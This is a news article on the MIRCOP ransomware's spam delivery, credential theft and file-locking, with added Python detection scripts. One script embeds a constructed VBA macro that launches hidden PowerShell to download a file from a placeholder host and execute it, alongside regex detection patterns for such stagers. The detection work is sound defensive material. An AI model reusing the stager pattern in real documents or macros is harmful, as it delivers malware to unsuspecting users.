
SecurityWeek

Malware & Threats

MIRCOP Ransomware Claims to be Victim, Demands Payback

Ransomware authors use various techniques to encourage victims to pay a ransom, and the actors behind a new threat called MIRCOP are employing an unusual one: the ransom note claims that the victim stole 48.48 Bitcoins. 

What’s more, the ransom note displays a hooded figure in a Guy Fawkes mask, long associated with the hacktivist collective Anonymous, and offers little instruction on how the ransom should be paid. Instead, it implies that the victim already knows how to return the money and whom to send it to.

At 48.48 Bitcoins, the ransom amounts to around $30,000, one of the highest seen to date, and the note threatens further action if the victim doesn’t pay, researchers at Trend Micro reveal. The note does include a Bitcoin address, but gives no guidance on how to make a cryptocurrency transaction, and at the time of writing no payment had been made to that address.

MIRCOP is distributed as a malicious document attached to spam emails, posing as a Thai customs form used when importing or exporting goods. The document asks the user to enable macros, ostensibly to sign it; the macro instead abuses Windows PowerShell to download and execute the malicious payload.
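A heuristic check for the delivery chain just described (macro that launches PowerShell to download and run a payload), written as an added example rather than code from the article or from Trend Micro. It assumes the VBA source has already been extracted from the document (for instance with oletools' olevba) and scores it by how many independent signal groups appear. The macro text below is constructed to show the shape of such a stager; it is not MIRCOP's actual macro, and the URL in it is a placeholder.

```python
"""Heuristic triage of extracted VBA macro text for PowerShell stagers.

Added example, not the article's or Trend Micro's code. Only the infection
chain (macro -> PowerShell -> download -> execute) is taken from the text;
the sample macros and the signal list are assumptions made here.
"""
import re

# Each entry is (label, regex). A stager usually hits several groups at once,
# while legitimate automation macros rarely hit more than one.
SIGNALS = [
    ("powershell_invocation", re.compile(r"\bpowershell(\.exe)?\b", re.I)),
    ("download_primitive",
     re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|Net\.WebClient", re.I)),
    ("stealth_switch",
     re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile|-exec(utionpolicy)?\s+bypass", re.I)),
    ("execute_downloaded",
     re.compile(r"Start-Process|\bIEX\b|Invoke-Expression|Shell\s*\(", re.I)),
    ("temp_drop", re.compile(r"%TEMP%|\$env:TEMP|Environ\(\s*\"TEMP\"\s*\)", re.I)),
]


def score_macro(vba_text):
    """Return (score, labels): the number and names of distinct signal groups hit."""
    labels = [label for label, rx in SIGNALS if rx.search(vba_text)]
    return len(labels), labels


def is_suspicious(vba_text, threshold=3):
    """Flag the macro when at least `threshold` signal groups are present."""
    return score_macro(vba_text)[0] >= threshold


# Constructed sample of a download-and-execute stager (NOT MIRCOP's real macro).
SAMPLE_STAGER = r'''
Sub AutoOpen()
    Dim cmd As String
    cmd = "powershell.exe -nop -w hidden -exec bypass -c " & _
          """(New-Object Net.WebClient).DownloadFile('http://example.invalid/x', $env:TEMP + '\x.exe'); " & _
          "Start-Process ($env:TEMP + '\x.exe')"""
    Shell cmd, vbHide
End Sub
'''

# Constructed benign macro for comparison.
SAMPLE_BENIGN = r'''
Sub FormatTable()
    ActiveSheet.Range("A1:D10").Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for name, text in (("stager", SAMPLE_STAGER), ("benign", SAMPLE_BENIGN)):
        print(name, score_macro(text), "suspicious" if is_suspicious(text) else "ok")
```

The threshold is deliberately a count of independent groups rather than a single regex: a macro that merely mentions PowerShell is common in admin tooling, but one that also hides its window, downloads to %TEMP% and starts the result is the pattern the article describes.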

MIRCOP drops three files in the %Temp% folder: c.exe (an information-stealing routine), and x.exe and y.exe (both used to encrypt files). Rather than appending an extension to encrypted files, as most ransomware families do, MIRCOP prepends the string “Lock.” to the file name. It also encrypts common user folders.
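A filesystem sweep for the artifacts in this paragraph, written as an added example (not code from the article or from Trend Micro). The only facts taken from the text are the “Lock.” prefix on encrypted files and the three dropper names in %Temp%; the directory layout and sample files are constructed here so the script runs offline. Because the marker is a prefix and the original extension is kept, an extension-based filter would miss these files, which is the point the sweep demonstrates.

```python
"""Sweep a directory tree for the MIRCOP file-naming and drop indicators.

Added example, not the article's or Trend Micro's code. Indicators taken
from the text: encrypted files are prefixed with "Lock." (no appended
extension) and c.exe, x.exe, y.exe are dropped in %Temp%. The sample tree
is constructed here and is not real victim data.
"""
import os
import tempfile
from pathlib import Path

LOCK_PREFIX = "Lock."                     # per the article
DROPPED_NAMES = {"c.exe", "x.exe", "y.exe"}  # per the article


def find_locked_files(root):
    """Return sorted paths under root whose basename starts with "Lock.".

    The check is on the name prefix, not the extension, because MIRCOP
    leaves the original extension in place ("Lock.report.docx").
    """
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.startswith(LOCK_PREFIX):
                hits.append(os.path.join(dirpath, name))
    return sorted(hits)


def find_dropped_binaries(temp_dir):
    """Return which of c.exe/x.exe/y.exe exist directly in temp_dir.

    A name match alone is weak evidence; treat it as a trigger for hash
    lookup and sandboxing rather than as a verdict.
    """
    return {name for name in DROPPED_NAMES
            if os.path.isfile(os.path.join(temp_dir, name))}


def build_sample_tree():
    """Constructed sample tree (assumption for the demo, not real data)."""
    root = Path(tempfile.mkdtemp(prefix="mircop_demo_"))
    docs = root / "Documents"
    docs.mkdir()
    (docs / "Lock.report.docx").write_bytes(b"\x00" * 16)
    (docs / "Lock.budget.xlsx").write_bytes(b"\x00" * 16)
    (docs / "notes.txt").write_text("clean file")
    (docs / "Lockdown_plan.pdf").write_bytes(b"\x00" * 16)  # no dot: not a hit
    temp = root / "Temp"
    temp.mkdir()
    (temp / "c.exe").write_bytes(b"MZ")
    (temp / "y.exe").write_bytes(b"MZ")
    return root


def triage(root):
    """Run both checks; paths are reported relative to root with '/' separators."""
    root = Path(root)
    locked = [Path(p).relative_to(root).as_posix()
              for p in find_locked_files(root / "Documents")]
    dropped = sorted(find_dropped_binaries(root / "Temp"))
    return {"locked": locked, "dropped": dropped}


if __name__ == "__main__":
    print(triage(build_sample_tree()))
```

On a live host the two roots would be the user profile and the real %Temp% directory; the sample tree only stands in for them so the functions can be exercised without an infection.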

In addition to encrypting files on the infected machine, MIRCOP can steal credentials from various applications, including Mozilla Firefox, Google Chrome, Opera, FileZilla, and Skype, researchers discovered. MIRCOP is not the first ransomware to pack information-stealing capabilities; CryptXXX has had the feature for over two months.

“Social engineering in the form of spam can lead to infection, especially when the malware employs underhanded tactics such as macro malware leveraging on PowerShell in attached files. Users should be careful when receiving mail from unknown sources and should refrain from downloading and opening their attachments if any,” Trend Micro researchers note.

Since the beginning of this year, ransomware has emerged as a prevalent threat, and a recent report from Kaspersky revealed that the number of users attacked with cryptoware increased 5.5 times over the past couple of years. At the moment, Locky appears to be the most prevalent ransomware family, courtesy of massive infection campaigns powered by the Necurs botnet.

Related: Bart Ransomware Doesn’t Require C&C Server to Encrypt Files